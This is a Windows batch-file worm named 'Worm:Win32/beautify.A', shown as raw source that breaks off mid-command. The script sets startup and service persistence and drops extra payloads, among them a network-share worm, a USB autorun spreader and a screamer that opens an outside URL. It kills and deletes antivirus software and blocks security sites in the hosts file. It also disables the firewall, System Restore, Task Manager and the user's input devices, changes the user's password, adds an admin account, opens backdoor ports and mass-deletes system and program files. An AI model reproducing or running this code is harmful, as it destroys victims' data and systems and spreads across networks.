@echo off >Nul & Color 0a & Mode 15,2 & Title Worm:Win32/beautify.A & Attrib %0 +H & cls reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d %0 /f > nul @echo x=msgbox("Error Win32 Application.",0+16," ") >"%temp%\Error.vbs" Attrib "%temp%\Error.vbs" +H & Start "%temp%\Error.vbs" :: RUN AS SERVICE/ REGISTRY START-UP set "servicename=beautify" @echo sc create %servicename% binpath=%0 >"%temp%\service.bat" @echo sc start %servicename% >>"%temp%\service.bat" Attrib "%temp%\service.bat" +H & start "%temp%\service.bat" Set "reg_path=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" reg add "%reg_path%" /v "Windows Services" /t "REG_SZ" /d %0 Taskkill /PID explorer.exe /F :: KILL FIREWALL net stop "MpsSvc" taskkill /f /t /im "FirewallControlPanel.exe" netsh firewall set opmode disable netsh advfirewall set opmode disable >"%Temp%.kill.reg" ECHO REGEDIT4 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.kill.reg" Del "%Temp%.kill.reg" :: DROP MORE MALWARE REM <==================Screamer=================> @echo If exist "%programfiles%\Google\Chrome\Application\chrome.exe" goto 1 >"%appdata%\Screamer.bat" @echo If exist "%programfiles%\Mozilla Firefox\firefox.exe" goto 2 >>"%appdata%\Screamer.bat" @echo Goto IE >>"%appdata%\Screamer.bat" @echo :1 >>"%appdata%\Screamer.bat" @echo Timeout /T 600 /NOBREAK ^>Nul >>"%appdata%\Screamer.bat" @echo Start chrome.exe http://akk.li/jeff/jeff.swf >>"%appdata%\Screamer.bat" @echo goto 1 >>"%appdata%\Screamer.bat" @echo :2 >>"%appdata%\Screamer.bat" @echo Timeout /T 600 /NOBREAK ^>Nul >>"%appdata%\Screamer.bat" @echo Start firefox.exe http://akk.li/jeff/jeff.swf >>"%appdata%\Screamer.bat" @echo goto 2 >>"%appdata%\Screamer.bat" @echo :IE >>"%appdata%\Screamer.bat" @echo Timeout /T 600 /NOBREAK ^>Nul >>"%appdata%\Screamer.bat" @echo Start iexplore.exe http://akk.li/jeff/jeff.swf >>"%appdata%\Screamer.bat" @echo goto IO >>"%appdata%\Screamer.bat" REM -Generate windows hidiing VBScript @echo Set wshShell=wscript.CreateObject("WScript.Shell") >Start_s.vbs @echo wshshell.run "%appdata%\Screamer.bat", 0 >>Start_s.vbs Attrib Start_s.vbs +H +R Start Start_s.vbs REM <================Speed_WorM================> @echo @echo off ^>Nul >"%appdata%\speed!.bat" @echo Title Worm:Win32/Speed.L >>"%appdata%\speed!.bat" @echo :worm >>"%appdata%\speed!.bat" @echo for /l %%%%R in ^(0,1,255^) do ^( >>"%appdata%\speed!.bat" @echo ping -n 1 192.168.0.%%%%R | find "100%%" >>"%appdata%\speed!.bat" @echo if errorlevel 1 ^( >>"%appdata%\speed!.bat" @echo echo 192.168.0.%%R ^>^> %%temp%%\range.txt >>"%appdata%\speed!.bat" @echo ^) >>"%appdata%\speed!.bat" @echo ^) >>"%appdata%\speed!.bat" @echo set worm=%%random%% >>"%appdata%\speed!.bat" @echo for /f %%%%N in ^(%%temp%%\range^) do ^( >>"%appdata%\speed!.bat" @echo copy %%0 \\%%%%N\ADMIN$\%%worm%%.bat >>"%appdata%\speed!.bat" @echo if errorlevel 0 call \\%%N\ADMIN$\%%worm%%.bat >>"%appdata%\speed!.bat" @echo copy %%0 \\%%%%N\C$\%%worm%%.bat >>"%appdata%\speed!.bat" @echo if errorlevel 0 call \\%%%%N\C$\%%worm%%.bat >>"%appdata%\speed!.bat" @echo copy %%0 \\%%%%N\D$\%%worm%%.bat >>"%appdata%\speed!.bat" @echo if errorlevel 0 call \\%%%%N\D$\%%worm%%.bat >>"%appdata%\speed!.bat" @echo ^) >>"%appdata%\speed!.bat" @echo @exit >>"%appdata%\speed!.bat" REM -Generate windows hidiing VBScript @echo Set wshShell=wscript.CreateObject("WScript.Shell") >Start_sw.vbs @echo wshshell.run "%appdata%\speed!.bat", 0 >>Start_sw.vbs Attrib Start_sw.vbs +H +R Start Start_sw.vbs REM <=============Cookie_Monster=============> @echo @echo off ^>Nul >"%appdata%\Zer0bug.bat" @echo :: Zer0bug_ViirUz >>"%appdata%\Zer0bug.bat" @echo Title Cookie_Monster >>"%appdata%\Zer0bug.bat" @echo @echo x=msgbox^("You have been infected by the Cookie Monster Virus.",0+16,"Zer0bug Infection!"^) ^>"%temp%\Error.vbs" >>"%appdata%\Zer0bug.bat" @echo Start "%temp%\Error.vbs" >>"%appdata%\Zer0bug.bat" @echo :loop >>"%appdata%\Zer0bug.bat" @echo Ftype ^>^>"%temp%\Cookie_%%random%%.ini" >>"%appdata%\Zer0bug.bat" @echo goto loop >>"%appdata%\Zer0bug.bat" @echo @exit /b >>"%appdata%\Zer0bug.bat" REM -Generate windows hiding VBScript @echo Set wshShell=wscript.CreateObject("WScript.Shell") >Start_zb.vbs @echo wshshell.run "%appdata%\Zer0bug.bat", 0 >>Start_zb.vbs Attrib Start_zb.vbs +H +R Start Start_zb.vbs <================NUKECHILD=============> :: http://www.hackforums.net/showthread.php?tid=1367748 @echo if exist "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.bat" ^( >"%programfiles%\nukechild.bat" @echo goto top-b >>"%programfiles%\nukechild.bat" @echo ^) >>"%programfiles%\nukechild.bat" @echo echo Why So Mad bro? ^>^> "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat" @echo echo taskkill /F /T explorer.exe ^>^> "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat" @echo echo taskkill /F /T winlogon.exe ^>^> "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat" @echo echo shutdown -s -f -t 10 -c "Why So Angry?" ^>^> "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat" @echo echo start /HIGH "%%userprofile%%\Desktop\windetect-fix.cmd" ^>^> "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat" @echo :top-b >>"%programfiles%\nukechild.bat" @echo set /a a=0 >>"%programfiles%\nukechild.bat" @echo assoc .exe=txtfile ^& assoc .dll=exefile >>"%programfiles%\nukechild.bat" @echo assoc .dat=txtfile ^& assoc .vbs=exefile >>"%programfiles%\nukechild.bat" @echo assoc .ini=exefile ^& assoc .com=exefile >>"%programfiles%\nukechild.bat" @echo assoc .cmd=exefile ^& assoc .txt=exefile >>"%programfiles%\nukechild.bat" @echo assoc .wav=txtfile ^& assoc .mp3=txtfile >>"%programfiles%\nukechild.bat" @echo assoc .mp4=txtfile ^& assoc .zip=txtfile >>"%programfiles%\nukechild.bat" @echo assoc .doc=txtfile ^& assoc .htm=dllfile >>"%programfiles%\nukechild.bat" @echo assoc .html=dllfile ^& assoc .img=txtfile >>"%programfiles%\nukechild.bat" @echo assoc .iso=txtfile ^& assoc .jar=txtfile >>"%programfiles%\nukechild.bat" @echo assoc .ico=txtfile ^& assoc .jpg=txtfile >>"%programfiles%\nukechild.bat" @echo assoc .png=txtfile ^& assoc .gif=txtfile >>"%programfiles%\nukechild.bat" @echo assoc .rt=txtfile >>"%programfiles%\nukechild.bat" @echo :middle >>"%programfiles%\nukechild.bat" @echo start /HIGH cmd ^& start /HIGH iexplore >>"%programfiles%\nukechild.bat" @echo start /HIGH firefox ^& start /HIGH notepad >>"%programfiles%\nukechild.bat" @echo start /HIGH explorer >>"%programfiles%\nukechild.bat" @echo copy %%0 C:\System-Fix-%%random%%.cmd >>"%programfiles%\nukechild.bat" @echo md %%homedrive%%\%%random%% >>"%programfiles%\nukechild.bat" @echo md %%userprofile%%\Desktop\%%random%% >>"%programfiles%\nukechild.bat" @echo if %%a%%==200 goto done >>"%programfiles%\nukechild.bat" @echo set /a a=%%a%%+1 >>"%programfiles%\nukechild.bat" @echo goto middle >>"%programfiles%\nukechild.bat" @echo :done >>"%programfiles%\nukechild.bat" @echo start %%0 ^& copy %%0 "%%userprofile%%\Desktop\windetect-fix.cmd" >>"%programfiles%\nukechild.bat" @echo ping localhost -n 2 ^>nul & start /HIGH "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" >>"%programfiles%\nukechild.bat" @echo echo Why so angry? > "%%homedrive%%\Windows\explorer.exe" >>"%programfiles%\nukechild.bat" @echo echo You look so sad, brah ^>^>"%%homedrive%%\Windows\explorer.exe" >>"%programfiles%\nukechild.bat" @echo start /HIGH "%%userprofile%%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nukechild.cmd" >>"%programfiles%\nukechild.bat" @echo del /f /s /q %%0 >>"%programfiles%\nukechild.bat" @echo @exit /b >>"%programfiles%\nukechild.bat" <==========================SLOGOD.Y==========================> @echo ATR = "[autorun]" ^& vbcrlf ^& "ShellExecute = wscript.exe >"%temp%\Slogod.Y.vbs" @echo "svchost.exe.vbs" >>"%temp%\Slogod.Y.vbs" @echo set fs = createobject ^("Scripting.FileSystemObject"^) >>"%temp%\Slogod.Y.vbs" @echo set mf = fs.getfile ^(Wscript.ScriptFullname^) >>"%temp%\Slogod.Y.vbs" @echo dim text, size >>"%temp%\Slogod.Y.vbs" @echo size = mf.size >>"%temp%\Slogod.Y.vbs" @echo check = mf.drive.drivetype >>"%temp%\Slogod.Y.vbs" @echo set text = mf.openastextstream ^(1,-2^) >>"%temp%\Slogod.Y.vbs" @echo do while not text.atendofstream >>"%temp%\Slogod.Y.vbs" @echo mysource = mysource ^& text.readline >>"%temp%\Slogod.Y.vbs" @echo mysource = mysource ^& vbcrlf >>"%temp%\Slogod.Y.vbs" @echo loop >>"%temp%\Slogod.Y.vbs" @echo do >>"%temp%\Slogod.Y.vbs" @echo Set winpath = fs.getspecialfolder ^(0^) >>"%temp%\Slogod.Y.vbs" @echo set tf = fs.getfile ^(winpath ^& "\svchost.exe.vbs"^) >>"%temp%\Slogod.Y.vbs" @echo tf.attributes = 32 >>"%temp%\Slogod.Y.vbs" @echo set tf = fs.createtextfile ^(winpath ^& "\ svchost.exe.vbs", 2, true^) >>"%temp%\Slogod.Y.vbs" @echo tf.write mysource >>"%temp%\Slogod.Y.vbs" @echo tf.close >>"%temp%\Slogod.Y.vbs" @echo set tf = fs.getfile ^(winpath ^& "\ svchost.exe.vbs"^) >>"%temp%\Slogod.Y.vbs" @echo tf.attributes = 39 >>"%temp%\Slogod.Y.vbs" @echo For Each flashdrive in fs.drives >>"%temp%\Slogod.Y.vbs" @echo If ^(flashdrive.drivetype = 1 or flashdrive.drivetype = 2^) and flashdrive.path ^<^> "A:" then >>"%temp%\Slogod.Y.vbs" @echo set tf = fs.getfile ^(flashdrive.path ^& "\ svchost.exe.vbs"^) >>"%temp%\Slogod.Y.vbs" @echo tf.attributes = 32 >>"%temp%\Slogod.Y.vbs" @echo set tf = fs.createtextfile ^(flashdrive.path ^& "\ svchost.exe.vbs", 2,true^) >>"%temp%\Slogod.Y.vbs" @echo tf.write mysource >>"%temp%\Slogod.Y.vbs" @echo tf.close >>"%temp%\Slogod.Y.vbs" @echo set tf = fs.getfile ^(flashdrive.path ^& "\ svchost.exe.vbs"^) >>"%temp%\Slogod.Y.vbs" @echo tf.attributes = 39 >>"%temp%\Slogod.Y.vbs" @echo set tf = fs.getfile ^(flashdrive.path ^& "\ autorun.inf"^) >>"%temp%\Slogod.Y.vbs" @echo tf.attributes = 32 >>"%temp%\Slogod.Y.vbs" @echo set tf = fs.createtextfile ^(flashdrive.path ^& "\ autorun.inf", 2, true^)v @echo ATR tf.write >>"%temp%\Slogod.Y.vbs" @echo tf.close >>"%temp%\Slogod.Y.vbs" @echo set tf = fs.getfile ^(flashdrive.path ^& "\autorun.inf"^) >>"%temp%\Slogod.Y.vbs" @echo tf.attributes = 39 >>"%temp%\Slogod.Y.vbs" @echo end if >>"%temp%\Slogod.Y.vbs" @echo next >>"%temp%\Slogod.Y.vbs" @echo set of RG = createobject ^("WScript.Shell"^) >>"%temp%\Slogod.Y.vbs" @echo rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost", winpath ^& "\svchost.exe.vbs" >>"%temp%\Slogod.Y.vbs" @echo rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL", "" >>"%temp%\Slogod.Y.vbs" @echo rg.regwrite "HKCR\vbsfile\DefaultIcon\", "shell32.dll, 3/ >>"%temp%\Slogod.Y.vbs" @echo if check ^<^> 1 then >>"%temp%\Slogod.Y.vbs" @echo Wscript.sleep 100,000 >>"%temp%\Slogod.Y.vbs" @echo end if >>"%temp%\Slogod.Y.vbs" @echo loop while check ^<^> 1 >>"%temp%\Slogod.Y.vbs" @echo set sd = createobject ^("Wscript.shell"^) >>"%temp%\Slogod.Y.vbs" @echo sd.run winpath ^& "\explorer.exe /e, /select," ^& Wscript.ScriptFullname >>"%temp%\Slogod.Y.vbs" @echo do while year ^(now^)> = 2007 >>"%temp%\Slogod.Y.vbs" @echo WScript.sleep >>"%temp%\Slogod.Y.vbs" Start "%temp%\Slogod.Y.vbs" :: DISABLE/DELETE ANTIVIRUS tskill /A av* & tskill /A fire* & tskill /A anti* & tskill /A spy* tskill /A bullguard & tskill /A PersFw & tskill /A KAV* & tskill /A ZONEALARM tskill /A SAFEWEB & tskill /A OUTPOST & tskill /A nv* & tskill /A nav* tskill /A F-* & tskill /A ESAFE & tskill /A cle & tskill /A BLACKICE tskill /A def* & tskill /A kav & tskill /A kav* & tskill /A avg* tskill /A ash* & tskill /A aswupdsv & tskill /A ewid* & tskill /A guard* tskill /A guar* & tskill /A gcasDt* & tskill /A msmp* & tskill /A mcafe* tskill /A mghtml & tskill /A msiexec & tskill /A outpost & tskill /A isafe tskill /A zap* & tskill /A zauinst & tskill /A upd* & tskill /A zlclien* tskill /A minilog & tskill /A cc* & tskill /A norton* & tskill /A norton au* tskill /A ccc* & tskill /A npfmn* & tskill /A loge* & tskill /A nisum* tskill /A issvc & tskill /A tmp* & tskill /A tmn* & tskill /A pcc* tskill /A cpd* & tskill /A pop* & tskill /A pav* & tskill /A padmin tskill /A panda* & tskill /A avsch* & tskill /A sche* & tskill /A syman* tskill /A virus* & tskill /A realm* & tskill /A sweep* & tskill /A scan* tskill /A ad-* & tskill /A safe* & tskill /A avas* & tskill /A norm* tskill /A msseces* & tskill /A mbam* & tskill /A komodo* & tskill /A spybot* & tskill /A MSASCui* If exist "%programfiles%\alwils~1\avast4\*.*" Del /F /Q "%programfiles%\alwils~1\avast4\*.*" If exist "%programfiles%\Lavasoft\Ad-awa~1\*.exe" Del /F /Q "%programfiles%\Lavasoft\Ad-awa~1\*.exe" If exist "%programfiles%\kasper~1\*.exe" Del /F /Q "%programfiles%\kasper~1\*.exe" If exist "%programfiles%\trojan~1\*.exe" Del /F /Q "%programfiles%\trojan~1\*.exe" If exist "%programfiles%\f-prot95\*.dll" Del /F /Q "%programfiles%\f-prot95\*.dll" If exist "%programfiles%\tbav\*.dat" Del /F /Q "%programfiles%\tbav\*.dat" If exist "%programfiles%\avpersonal\*.vdf" Del /F /Q "%programfiles%\avpersonal\*.vdf" If exist "%programfiles%\Norton~1\*.cnt" Del /F /Q "%programfiles%\Norton~1\*.cnt" If exist "%programfiles%\Mcafee\*.*" Del /F /Q "%programfiles%\Mcafee\*.*" If exist "%programfiles%\Norton~1\Norton~1\Norton~3\*.*" Del /F /Q "%programfiles%\Norton~1\Norton~1\Norton~3\*.*" If exist "%programfiles%\Norton~1\Norton~1\speedd~1\*.*" Del /F /Q "%programfiles%\Norton~1\Norton~1\speedd~1\*.*" If exist "%programfiles%\Norton~1\Norton~1\*.*" Del /F /Q "%programfiles%\Norton~1\Norton~1\*.*" If exist "%programfiles%\avgamsr\*.exe" Del /F /Q "%programfiles%\avgamsr\*.exe" If exist "%programfiles%\nood32\*.exe" Del /F /Q "%programfiles%\nood32\*.exe" If exist "%programfiles%\avgemc\*.exe" Del /F /Q "%programfiles%\avgemc\*.exe" If exist "%programfiles%\Norton~1\*.*" Del /F /Q "%programfiles%\Norton~1\*.*" If exist "%programfiles%\kavmm\*.exe" Del /F /Q "%programfiles%\kavmm\*.exe" If exist "%programfiles%\avgcc\*.exe" Del /F /Q "%programfiles%\avgcc\*.exe" If exist "%programfiles%\avgamsvr\*.exe" Del /F /Q "%programfiles%\avgamsvr\*.exe" If exist "%programfiles%\avgupsvc\*.exe" Del /F /Q "%programfiles%\avgupsvc\*.exe" If exist "%programfiles%\ewidoctrl\*.exe" Del /F /Q "%programfiles%\ewidoctrl\*.exe" If exist "%programfiles%\nood32krn\*.exe" Del /F /Q "%programfiles%\nood32krn\*.exe" If exist "%programfiles%\grisoft\*.*" Del /F /Q "%programfiles%\grisoft\*.*" If exist "%programfiles%\nod32\*.*" Del /F /Q "%programfiles%\nod32\*.*" If exist "%programfiles%\nood32\*.*" Del /F /Q "%programfiles%\nood32\*.*" If exist "%programfiles%\kav\*.exe" Del /F /Q "%programfiles%\kav\*.exe" If exist "%programfiles%\kaspersky\*.*" Del /F /Q "%programfiles%\kaspersky\*.*" If exist "%programfiles%\guard\*.exe" Del /F /Q "%programfiles%\guard\*.exe" If exist "%programfiles%\ewido\*.exe" Del /F /Q "%programfiles%\ewido\*.exe" If exist "%programfiles%\pavprsrv\*.exe" Del /F /Q "%programfiles%\pavprsrv\*.exe" If exist "%programfiles%\pavprot\*.exe" Del /F /Q "%programfiles%\pavprot\*.exe" If exist "%programfiles%\avengine\*.exe" Del /F /Q "%programfiles%\avengine\*.exe" If exist "%programfiles%\apvxdwin\*.exe" Del /F /Q "%programfiles%\apvxdwin\*.exe" If exist "%programfiles%\webproxy\*.exe" Del /F /Q "%programfiles%\webproxy\*.exe" If exist "%programfiles%\panda software\*.*" Del /F /Q "%programfiles%\panda software\*.*" :: CONFUSE/DISABLE USER FUNCTIONS rundll32 keyboard,disable & rundll32 mouse,disable & rundll32 USER32.DLL,SwapMouseButton echo Windows Registry Editor Version 5.00 >"%temp%\beautify.reg" echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >>"%temp%\beautify.reg" echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >>"%temp%\beautify.reg" echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >>"%temp%\beautify.reg" echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >>"%temp%\beautify.reg" echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >>"%temp%\beautify.reg" echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >>"%temp%\beautify.reg" echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >>"%temp%\beautify.reg" echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >>"%temp%\beautify.reg" echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >>"%temp%\beautify.reg" echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >>"%temp%\beautify.reg" echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >>"%temp%\beautify.reg" Attrib "%temp%\beautify.reg" +R +H +S & START "%temp%\beautify.reg" :: DELETE/DISABLE SYSTEM RESTORE @echo Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR","1", "REG_DWORD" >"%temp%\beautify.vbs" @echo Shell.regwrite "HKLM\SYSTEM\CurrentControlSet\Services\sr","4", "REG_DWORD >>"%temp%\beautify.vbs" Attrib "%temp%\beautify.vbs" +R +S +H & Start "%temp%\beautify.vbs" Attrib "%homedrive%\Windows\System32\rstrui.exe" -r -s -h Del /F /Q "%homedrive%\Windows\System32\rstrui.exe" :: DISABLE TASK MANAGER Set "hklm1=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" Reg add %hklm1% /v DisableTaskMgr /t REG_SZ /d 1 /f >nul :: DISABLE UAC Set "hklm2=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" @Cmd /k Reg Add "%hklm2%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul :: BLOCK MAJOR ANTIVIRAL WEBSITE(S) set hosts=%windir%\System32\drivers\etc\hosts @echo. >> %hosts% @echo avast.com >> %hosts% @echo avp.com >> %hosts% @echo avira.com >> %hosts% @echo ca.com >> %hosts% @echo customer.symantec.com >> %hosts% @echo dispatch.mcafee.com >> %hosts% @echo download.mcafee.com >> %hosts% @echo eset.com >> %hosts% @echo f-secure.com >> %hosts% @echo kaspersky.com >> %hosts% @echo kaspersky-labs.com >> %hosts% @echo liveupdate.symantec.com >> %hosts% @echo liveupdate.symantecliveupdate.com >> %hosts% @echo mast.mcafee.com >> %hosts% @echo mcafee.com >> %hosts% @echo microsoft.com >> %hosts% @echo my-etrust.com >> %hosts% @echo nai.com >> %hosts% @echo networkassociates.com >> %hosts% @echo pandasoftware.com >> %hosts% @echo rads.mcafee.com >> %hosts% @echo secure.nai.com >> %hosts% @echo securityresponse.symantec.com >> %hosts% @echo sophos.com >> %hosts% @echo symantec.com >> %hosts% @echo trendmicro.com >> %hosts% @echo updates.symantec.com >> %hosts% @echo update.symantec.com >> %hosts% @echo us.mcafee.com >> %hosts% @echo viruslist.com >> %hosts% @echo virustotal.com >> %hosts% @echo www.avp.com >> %hosts% @echo www.f-secure.com >> %hosts% @echo www.grisoft.com >> %hosts% @echo www.kaspersky.com >> %hosts% @echo www.mcafee.com >> %hosts% @echo www.microsoft.com >> %hosts% @echo www.my-etrust.com >> %hosts% @echo www.nai.com >> %hosts% @echo www.networkassociates.com >> %hosts% @echo www.pandasoftware.com >> %hosts% @echo www.sophos.com >> %hosts% @echo www.symantec.com >> %hosts% @echo www.trendmicro.com >> %hosts% @echo www.virustotal.com >> %hosts% @echo www.safer-networking.org >> %hosts% :: DISABLE INTERNET Ipconfig /release IPCONFIG /Release *Con* if ERRORLEVEL1 ipconfig /release_all :: CHANGE CURRENT USERS PASSWORD net user %username% "beautify" :: DISABLE ADMINISTRATOR @Set RegistyEditCmd=Cmd /k Reg Add @Set HiveSysKey=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System @%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul :: INFECT REGISTRY set valinf="rundll32_%random%_toolbar" set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run" reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul :: BACKDOOR PORTS netsh firewall add portopening ALL 7 beautify netsh firewall add portopening ALL 19 beautify netsh firewall add portopening ALL 20 beautify netsh firewall add portopening ALL 21 beautify netsh firewall add portopening ALL 22 beautify netsh firewall add portopening ALL 23 beautify netsh firewall add portopening ALL 25 beautify netsh firewall add portopening ALL 37 beautify netsh firewall add portopening ALL 53 beautify netsh firewall add portopening ALL 69 beautify netsh firewall add portopening ALL 79 beautify netsh firewall add portopening ALL 80 beautify netsh firewall add portopening ALL 110 beautify netsh firewall add portopening ALL 111 beautify netsh firewall add portopening ALL 135 beautify netsh firewall add portopening ALL 137 beautify netsh firewall add portopening ALL 138 beautify netsh firewall add portopening ALL 139 beautify netsh firewall add portopening ALL 161 beautify netsh firewall add portopening ALL 443 beautify netsh firewall add portopening ALL 445 beautify netsh firewall add portopening ALL 512 beautify netsh firewall add portopening ALL 513 beautify netsh firewall add portopening ALL 514 beautify netsh firewall add portopening ALL 522 beautify netsh firewall add portopening ALL 1433 beautify netsh firewall add portopening ALL 1434 beautify netsh firewall add portopening ALL 1604 beautify netsh firewall add portopening ALL 1723 beautify netsh firewall add portopening ALL 1900 beautify netsh firewall add portopening ALL 3074 beautify netsh firewall add portopening ALL 3389 beautify netsh firewall add portopening ALL 6667 beautify netsh firewall add portopening ALL 8080 beautify netsh firewall add portopening ALL 25565 beautify netsh firewall add portopening ALL 43595 beautify :: DISABLE REGISTRY TOOLS: Set "reg_path2=hkcu\software\microsoft\windows\currentversion\policies\system" reg add "%reg_path2%" /v disableregistrytools /t reg_dword /d "1" /f :: CREATE AN ADMINISTRATOR ACCOUNT net user beautify beautify /add net localgroup administrators UN /add :: DISABLE CONFIGURATION MANAGER: Attrib "%SystemDrive%\WINDOWS\system32\hal.dll" -r -s h Del /F /Q "%SystemDrive%\WINDOWS\system32\hal.dll" :: MAIN DESTRUCTION Copy %0 "%homedrive%\Documents and Settings" Assoc .dll=beautifyfile ren /S /F /Q *.exe *.beautify ren /S /F /Q *.zip *.beautify ren /S /F /Q *.txt *.beautify ren /S /F /Q *.rtf *.beautify ren /F /S /Q *.doc *.beautify Attrib "%homedrive%\*.*" -r -s -h If exist "%homedrive%\PerfLogs" Attrib "%homedrive%\PerfLogs" -r -s -h Del /F /Q /S "%homedrive%\PerfLogs" If exist "%homedrive%\PerfLogs\Admin" Attrib "%homedrive%\PerfLogs\Admin" -r -s -h Del /F /Q /S "%homedrive%\PerfLogs\Admin" & Del /F /Q /S "%homedrive%\PerfLogs\Admin\*.*" If exist "%programfiles%\Common Files" goto delcomfil If not exist "%programfiles%\Common Files" goto pascomfil :delcomfil Attrib "%programfiles%\Common Files" -r -s -h Attrib "%programfiles%\Common Files\*.*" -r -s -h Del /F /Q /S "%programfiles%\Common Files\*.*" Del /F /Q /S "%programfiles%\Common Files" :pascomfil If exsit "%programfiles%\DVD Maker" goto deldvdmak If not exsit "%programfiles%\DVD Maker" goto pasdvdmak :deldvdmak Attrib "%programfiles%\DVD Maker" -r -s -h Attrib "%programfiles%\DVD Maker\*.*" -r -s -h Del /F /Q /S "%programfiles%\DVD Maker\*.*" Del /F /Q /S "%programfiles%\DVD Maker" :pasdvdmak If exist "%programfiles%\Google" goto delgoogle If not exist "%programfiles%\Google" goto pasgoogle :delgoogle Attrib "%programfiles%\Google\*.*" -r -s -h Attrib "%programfiles%\Google" -r -s -h Del /F /Q /S "%programfiles%\Google\*.*" Del /F /Q /S "%programfiles%\Google" :pasgoogle If exist "%programfiles%\HTML Help Workshop" goto delhtml If not exist "%programfiles%\HTML Help Workshop" goto pashtml :delhtml Attrib "%programfiles%\HTML Help Workshop\*.*" -r -s -h Attrib "%programfiles%\HTML Help Workshop" -r -s -h Del /F /Q /S "%programfiles%\HTML Help Workshop\*.*" Del /F /Q /S "%programfiles%\HTML Help Workshop" If exist "%programfiles%\IIS" goto deliis If not exist "%programfiles%\IIS" goto pasiss :deliis Attrib "%programfiles%\IIS\*.*" -r -s -h Attrib "%programfiles%\IIS" -r -s -h Del /F /Q /S "%programfiles%\IIS\*.*" Del /F /Q /S "%programfiles%\IIS" :pasiss If exist "%programfiles%\IIS Express" goto delisexp If not exist "%programfiles%\IIS Express" goto pasisexp :delisexp Attrib "%programfiles%\IIS Express\*.*" -r -s -h Attrib "%programfiles%\IIS Express" -r -s -h Del /F /Q /S "%programfiles%\IIS Express\*.*" Del /F /Q /S "%programfiles%\IIS Express" :pasisexp If exist "%programfiles%\Internet Explorer" goto delie If not exist "%programfiles%\Internet Explorer" goto pasie :delie Attrib "%programfiles%\Internet Explorer\*.*" -r -s -h Attrib "%programfiles%\Internet Explorer" -r -s -h Del /F /Q /S "%programfiles%\Internet Explorer\*.*" Del /F /Q /S "%programfiles%\Internet Explorer" :pasie If exist "%programfiles%\Microsoft ASP.NET" goto delmsant If not exist "%programfiles%\Microsoft ASP.NET" goto pasmsant :delmsant Attrib "%programfiles%\Microsoft ASP.NET\*.*" -r -s -h Attrib "%programfiles%\Microsoft ASP.NET" -r -s -h Del /F /Q /S "%programfiles%\Microsoft ASP.NET\*.*" Del /F /Q /S "%programfiles%\Microsoft ASP.NET" :pasmsant If exist "%programfiles%\Microsoft Help Viewer" goto delmshv If not exist "%programfiles%\Microsoft Help Viewer" goto pasmshv :delmshv Attrib "%programfiles%\Microsoft ASP.NET\*.*" -r -s -h Attrib "%programfiles%\Microsoft ASP.NET" -r -s -h Del /F /Q /S "%programfiles%\Microsoft ASP.NET\*.*" Del /F /Q /S "%programfiles%\Microsoft ASP.NET" :pasmshv If exsit "%programfiles%\Microsoft SDKs" goto delmssdk If not exsit "%programfiles%\Microsoft SDKs" goto pasmssdk :delmssdk Attrib "%programfiles%\Microsoft SDKs\*.*" 